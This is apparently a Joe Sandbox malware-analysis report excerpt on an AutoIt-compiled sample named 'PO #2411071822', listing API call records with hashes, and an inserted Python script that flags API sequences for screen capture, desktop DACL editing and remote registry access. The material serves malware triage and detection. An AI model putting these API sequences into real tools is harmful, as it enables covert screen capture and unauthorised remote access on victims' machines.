                                                                                                               • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                                              • String ID: *.*
                                                                                                              • API String ID: 34673085-438819550
                                                                                                              • Opcode ID: 3019c3dd2a1f58101dcd495cf65742f1662eede6d2e3479b282eb86983dab8ff
                                                                                                              • Instruction ID: 967ae05e0ad0d72929d1a9e9ed07c0b84eac3e7337db04aadaab523c0d960bf4
                                                                                                              • Opcode Fuzzy Hash: 3019c3dd2a1f58101dcd495cf65742f1662eede6d2e3479b282eb86983dab8ff
                                                                                                              • Instruction Fuzzy Hash: 3081A0715043059FCB24EF24C86596FB3E8AB88304F149A2FF885D7251E738E945CB9A
                                                                                                              APIs
                                                                                                                • Part of subcall function 003FB34E: GetWindowLongW.USER32(?,000000EB), ref: 003FB35F
                                                                                                              • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0044EF3B
                                                                                                              • GetFocus.USER32 ref: 0044EF4B
                                                                                                              • GetDlgCtrlID.USER32(00000000), ref: 0044EF56
                                                                                                              • _memset.LIBCMT ref: 0044F081
                                                                                                              • GetMenuItemInfoW.USER32 ref: 0044F0AC
                                                                                                              • GetMenuItemCount.USER32(00000000), ref: 0044F0CC
                                                                                                              • GetMenuItemID.USER32(?,00000000), ref: 0044F0DF
                                                                                                              • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 0044F113
                                                                                                              • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 0044F15B
                                                                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0044F193
                                                                                                              • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0044F1C8
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                                              • String ID: 0
                                                                                                              • API String ID: 1296962147-4108050209
                                                                                                              • Opcode ID: c62bb38c79ade18453c3d5efaa4d01341145e32d29f0919bf64cedd9201f7cc4
                                                                                                              • Instruction ID: aeeff8faa07281f9a89017eda57eb54aa16fa6ccb2a9eb8ad169cfeabf91f1e4
                                                                                                              • Opcode Fuzzy Hash: c62bb38c79ade18453c3d5efaa4d01341145e32d29f0919bf64cedd9201f7cc4
                                                                                                              • Instruction Fuzzy Hash: DF816B71A04311EFEB10CF15C884A6BBBE9FB88314F04492EF99597291D774DD09CBAA
                                                                                                              APIs
                                                                                                                • Part of subcall function 0041ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0041ABD7
                                                                                                                • Part of subcall function 0041ABBB: GetLastError.KERNEL32(?,0041A69F,?,?,?), ref: 0041ABE1
                                                                                                                • Part of subcall function 0041ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0041A69F,?,?,?), ref: 0041ABF0
                                                                                                                • Part of subcall function 0041ABBB: HeapAlloc.KERNEL32(00000000,?,0041A69F,?,?,?), ref: 0041ABF7
                                                                                                                • Part of subcall function 0041ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0041AC0E
                                                                                                                • Part of subcall function 0041AC56: GetProcessHeap.KERNEL32(00000008,0041A6B5,00000000,00000000,?,0041A6B5,?), ref: 0041AC62
                                                                                                                • Part of subcall function 0041AC56: HeapAlloc.KERNEL32(00000000,?,0041A6B5,?), ref: 0041AC69
                                                                                                                • Part of subcall function 0041AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0041A6B5,?), ref: 0041AC7A
                                                                                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0041A8CB
                                                                                                              • _memset.LIBCMT ref: 0041A8E0
                                                                                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0041A8FF
                                                                                                              • GetLengthSid.ADVAPI32(?), ref: 0041A910
                                                                                                              • GetAce.ADVAPI32(?,00000000,?), ref: 0041A94D
                                                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0041A969
                                                                                                              • GetLengthSid.ADVAPI32(?), ref: 0041A986
                                                                                                              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0041A995
                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 0041A99C
                                                                                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0041A9BD
                                                                                                              • CopySid.ADVAPI32(00000000), ref: 0041A9C4
                                                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0041A9F5
                                                                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0041AA1B
                                                                                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0041AA2F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                              • String ID:
                                                                                                              • API String ID: 3996160137-0
                                                                                                              • Opcode ID: a568935e142829b412fb5b3b0afd6062acffecd89fcf8596bd7cc824a5616bb8
                                                                                                              • Instruction ID: de36b881b0eb76679fd94f98309d064384eedba83b19ad37eaf02aeb3a0d5d6f
                                                                                                              • Opcode Fuzzy Hash: a568935e142829b412fb5b3b0afd6062acffecd89fcf8596bd7cc824a5616bb8
                                                                                                              • Instruction Fuzzy Hash: 51515CB1E01209AFDF10DF91DD45AEEBB79FF04304F04812AF911A7290EB789A55CB65
                                                                                                              APIs
                                                                                                              • GetDC.USER32(00000000), ref: 00439E36
                                                                                                              • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00439E42
                                                                                                              • CreateCompatibleDC.GDI32(?), ref: 00439E4E
                                                                                                              • SelectObject.GDI32(00000000,?), ref: 00439E5B
                                                                                                              • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00439EAF
                                                                                                              • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00439EEB
                                                                                                              • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00439F0F
                                                                                                              • SelectObject.GDI32(00000006,?), ref: 00439F17
                                                                                                              • DeleteObject.GDI32(?), ref: 00439F20
                                                                                                              • DeleteDC.GDI32(00000006), ref: 00439F27
                                                                                                              • ReleaseDC.USER32(00000000,?), ref: 00439F32
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                              • String ID: (
                                                                                                              • API String ID: 2598888154-3887548279
                                                                                                              • Opcode ID: 3c0139ce9ff15646cfba8b91adb05cef809e333b57248ebf6da38d10348e743c
                                                                                                              • Instruction ID: 26149cb6ec55aa61e016294ea7f75a6f6daf0c4486456452acf3ea7cb4fd258c
                                                                                                              • Opcode Fuzzy Hash: 3c0139ce9ff15646cfba8b91adb05cef809e333b57248ebf6da38d10348e743c
                                                                                                              • Instruction Fuzzy Hash: 0D514B71A04309AFCB15CFA8CC85EAEBBB9EF48710F14842EF95997250D775AC41CB64
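The two function records above are the kind of API sequence a triager wants to find automatically across a whole report rather than by scrolling: the first walks a user-object security descriptor and appends ACEs (GetUserObjectSecurity, GetSecurityDescriptorDacl, AddAce, SetSecurityDescriptorDacl, SetUserObjectSecurity), the second is a textbook GDI screen grab (GetDC, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt with 00CC0020 = SRCCOPY, GetDIBits with 00000028 = sizeof(BITMAPINFOHEADER)). The Python below is an added example, not Joe Sandbox code and not part of this report. It parses the "APIs" bullet layout used on this page and tests every function record against ordered API subsequences. The regular expression, the technique labels and their API lists, and the sample text (API lines copied from the menu, DACL and screen-capture records on this page, trimmed) are this example's own assumptions; the lists are not Joe Sandbox signature definitions, and a match only says the sequence is present in the function, not that it ran or why.

```python
"""Added example: parse Joe Sandbox "APIs" records and flag known API call sequences."""
import re
from typing import Dict, List, Optional

# One bullet from a function record, e.g.
#   • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00439F0F
#   • Part of subcall function 0041ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0041ABD7
#   • _memset.LIBCMT ref: 0044F081
# This regex is the example's own reading of that layout, not a Joe Sandbox format spec.
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)

# Ordered API subsequences worth flagging. Labels and lists are assumptions made for
# this example from the records on this page; they are not sandbox signatures.
TECHNIQUES: Dict[str, List[str]] = {
    "gdi screen capture": [
        "GetDC", "CreateCompatibleBitmap", "CreateCompatibleDC",
        "SelectObject", "StretchBlt", "GetDIBits",
    ],
    "window-station/desktop DACL edit": [
        "GetUserObjectSecurity", "GetSecurityDescriptorDacl", "AddAce",
        "SetSecurityDescriptorDacl", "SetUserObjectSecurity",
    ],
    "remote registry over a network session": [
        "WNetAddConnection2W", "RegConnectRegistryW", "RegOpenKeyExW",
    ],
}


def parse_records(report_text: str) -> List[List[dict]]:
    """Split report text into function records: one list of parsed calls per "APIs" heading."""
    records: List[List[dict]] = []
    current: Optional[List[dict]] = None
    for line in report_text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            current = []
            records.append(current)
            continue
        if not stripped.startswith("•"):
            current = None  # "Strings", "Memory Dump Source", ... end the API list
            continue
        m = API_RE.match(line)
        if current is not None and m:
            current.append({"api": m["api"], "module": m["mod"], "ref": m["ref"],
                            "args": m["args"], "subcall": m["sub"]})
    return records


def is_subsequence(needle: List[str], haystack: List[str]) -> bool:
    """True if every name in needle occurs in haystack in that relative order (gaps allowed)."""
    it = iter(haystack)
    return all(any(h == n for h in it) for n in needle)


def classify(report_text: str) -> Dict[str, List[str]]:
    """Map each record's first own (non-subcall) ref address to the technique labels it matches."""
    result: Dict[str, List[str]] = {}
    for calls in parse_records(report_text):
        if not calls:
            continue
        own = [c for c in calls if c["subcall"] is None] or calls
        # Subcall lines stay in the sequence: those APIs are reachable from this function.
        names = [c["api"] for c in calls]
        result[own[0]["ref"]] = [label for label, seq in TECHNIQUES.items()
                                 if is_subsequence(seq, names)]
    return result


# Constructed sample: API lines copied from three records on this page (trimmed).
SAMPLE = """\
APIs
• GetFocus.USER32 ref: 0044EF4B
• GetDlgCtrlID.USER32(00000000), ref: 0044EF56
• _memset.LIBCMT ref: 0044F081
• GetMenuItemInfoW.USER32 ref: 0044F0AC
• DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0044F1C8
Strings
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
APIs
  • Part of subcall function 0041ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0041ABD7
  • Part of subcall function 0041AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0041A6B5,?), ref: 0041AC7A
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0041A8CB
• GetAce.ADVAPI32(?,00000000,?), ref: 0041A94D
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0041A969
• CopySid.ADVAPI32(00000000), ref: 0041A9C4
• AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0041A9F5
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0041AA1B
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 0041AA2F
Memory Dump Source
APIs
• GetDC.USER32(00000000), ref: 00439E36
• CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00439E42
• CreateCompatibleDC.GDI32(?), ref: 00439E4E
• SelectObject.GDI32(00000000,?), ref: 00439E5B
• StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00439EAF
• GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00439EEB
• GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00439F0F
• ReleaseDC.USER32(00000000,?), ref: 00439F32
Strings
"""

if __name__ == "__main__":
    for ref, labels in classify(SAMPLE).items():
        print(ref, labels or "-")
```

Ordered subsequence matching rather than a plain set test keeps the DACL pattern from firing on any function that merely imports AddAce, and it tolerates the interleaved _memset, GetLengthSid and HeapAlloc calls the real record contains. Feeding the whole exported report through `classify` gives one line per function, keyed by the first ref address, which is what you paste into notes next to the function's Opcode ID.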
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: LoadString__swprintf_wprintf
                                                                                                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                              • API String ID: 2889450990-2391861430
                                                                                                              • Opcode ID: 0e9c44e7e3ddb0ec104543b9367cf30dde4d0c9abc8ea742a5fa21b3869dde45
                                                                                                              • Instruction ID: 6c6a059db6fc4b59a7df0bc83436089760443449382e0e00aa26cb6226665f28
                                                                                                              • Opcode Fuzzy Hash: 0e9c44e7e3ddb0ec104543b9367cf30dde4d0c9abc8ea742a5fa21b3869dde45
                                                                                                              • Instruction Fuzzy Hash: 0551D331900169BACF12EBE1DD82EEEBB78AF05304F100266F505760A2EB746F59CB65
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: LoadString__swprintf_wprintf
                                                                                                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                              • API String ID: 2889450990-3420473620
                                                                                                              • Opcode ID: 464e3de0b72e0cc75a091f871042ee964181dec17ceb40c74b083abc8f48e681
                                                                                                              • Instruction ID: 74a2b1b884f9a09f71916d93a580b433bfc0bce18c7aec5482d6f265d70ee9d0
                                                                                                              • Opcode Fuzzy Hash: 464e3de0b72e0cc75a091f871042ee964181dec17ceb40c74b083abc8f48e681
                                                                                                              • Instruction Fuzzy Hash: DC51D131900169BACF16EBE1DD82EEEBB78AF04344F500166F105760A2EB786F59CF65
                                                                                                              APIs
                                                                                                              • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00442BB5,?,?), ref: 00443C1D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: BuffCharUpper
                                                                                                              • String ID: $EI$HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                              • API String ID: 3964851224-2147513561
                                                                                                              • Opcode ID: 992b8b08258db78b78476da350d782c966bf9a51c3c9f1ec58736869614c8ef3
                                                                                                              • Instruction ID: bbdea89195472bcc005644557164e13d2745037bec6aa9492b4c6e9b059d3e55
                                                                                                              • Opcode Fuzzy Hash: 992b8b08258db78b78476da350d782c966bf9a51c3c9f1ec58736869614c8ef3
                                                                                                              • Instruction Fuzzy Hash: DA41B17050028A9BEF01EF50D851AEB3721AF62751F104836FD551F2A2EB78AE0BCB18
                                                                                                              APIs
                                                                                                              • _memset.LIBCMT ref: 004255D7
                                                                                                              • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00425664
                                                                                                              • GetMenuItemCount.USER32(004A1708), ref: 004256ED
                                                                                                              • DeleteMenu.USER32(004A1708,00000005,00000000,000000F5,?,?), ref: 0042577D
                                                                                                              • DeleteMenu.USER32(004A1708,00000004,00000000), ref: 00425785
                                                                                                              • DeleteMenu.USER32(004A1708,00000006,00000000), ref: 0042578D
                                                                                                              • DeleteMenu.USER32(004A1708,00000003,00000000), ref: 00425795
                                                                                                              • GetMenuItemCount.USER32(004A1708), ref: 0042579D
                                                                                                              • SetMenuItemInfoW.USER32(004A1708,00000004,00000000,00000030), ref: 004257D3
                                                                                                              • GetCursorPos.USER32(?), ref: 004257DD
                                                                                                              • SetForegroundWindow.USER32(00000000), ref: 004257E6
                                                                                                              • TrackPopupMenuEx.USER32(004A1708,00000000,?,00000000,00000000,00000000), ref: 004257F9
                                                                                                              • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00425805
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                                              • String ID:
                                                                                                              • API String ID: 3993528054-0
                                                                                                              • Opcode ID: 2c4bfffb2ea69dafb8529ea07958a229928669921fb8e0f172963d5f5ef0f336
                                                                                                              • Instruction ID: 8ea68a115ba2e6fdfc3744fef9a916f631e96f1c5054a7488cee6be174aaf41b
                                                                                                              • Opcode Fuzzy Hash: 2c4bfffb2ea69dafb8529ea07958a229928669921fb8e0f172963d5f5ef0f336
                                                                                                              • Instruction Fuzzy Hash: D3712730B40625BEEB209B15EC49FAABF65FF40368FA44217F519AA2D0C7B85C10CB5D
                                                                                                              APIs
                                                                                                              • _memset.LIBCMT ref: 0041A1DC
                                                                                                              • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 0041A211
                                                                                                              • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0041A22D
                                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 0041A249
                                                                                                              • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 0041A273
                                                                                                              • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0041A29B
                                                                                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0041A2A6
                                                                                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0041A2AB
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
                                                                                                              • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                              • API String ID: 1687751970-22481851
                                                                                                              • Opcode ID: bffe8d20610d47effe187b1e81593ebb8df0969a66e4e46b67d4039e0b8b0874
                                                                                                              • Instruction ID: a1edbafc751d18c1baae353c970e9bb6ca14f917cb061057d52f5d92af2e686f
                                                                                                              • Opcode Fuzzy Hash: bffe8d20610d47effe187b1e81593ebb8df0969a66e4e46b67d4039e0b8b0874
                                                                                                              • Instruction Fuzzy Hash: 57412872C10229ABCF12EFA5DC85DEEB778BF08344F00416AE901B72A0EB749E55CB54
                                                                                                              APIs
                                                                                                              • __swprintf.LIBCMT ref: 004267FD
                                                                                                              • __swprintf.LIBCMT ref: 0042680A
                                                                                                                • Part of subcall function 0040172B: __woutput_l.LIBCMT ref: 00401784
                                                                                                              • FindResourceW.KERNEL32(?,?,0000000E), ref: 00426834
                                                                                                              • LoadResource.KERNEL32(?,00000000), ref: 00426840
                                                                                                              • LockResource.KERNEL32(00000000), ref: 0042684D
                                                                                                              • FindResourceW.KERNEL32(?,?,00000003), ref: 0042686D
                                                                                                              • LoadResource.KERNEL32(?,00000000), ref: 0042687F
                                                                                                              • SizeofResource.KERNEL32(?,00000000), ref: 0042688E
                                                                                                              • LockResource.KERNEL32(?), ref: 0042689A
                                                                                                              • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 004268F9
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                                              • String ID: 5I
                                                                                                              • API String ID: 1433390588-1224781598
                                                                                                              • Opcode ID: 82c6fbd1fba5c00e3be05e722809ea159a819795221b3c69abe14021739758ff
                                                                                                              • Instruction ID: 89151df19e2cfe03f9b8906f98f4246fad024a6c2ace8079f14daf57a0bb62df
                                                                                                              • Opcode Fuzzy Hash: 82c6fbd1fba5c00e3be05e722809ea159a819795221b3c69abe14021739758ff
                                                                                                              • Instruction Fuzzy Hash: 3B31B371E0122AABDB10AF61ED54ABF7BA8EF08340F418436F902D2150E778D911DB69
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,004536F4,00000010,?,Bad directive syntax error,0047DC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 004225D6
                                                                                                              • LoadStringW.USER32(00000000,?,004536F4,00000010), ref: 004225DD
                                                                                                              • _wprintf.LIBCMT ref: 00422610
                                                                                                              • __swprintf.LIBCMT ref: 00422632
                                                                                                              • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 004226A1
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
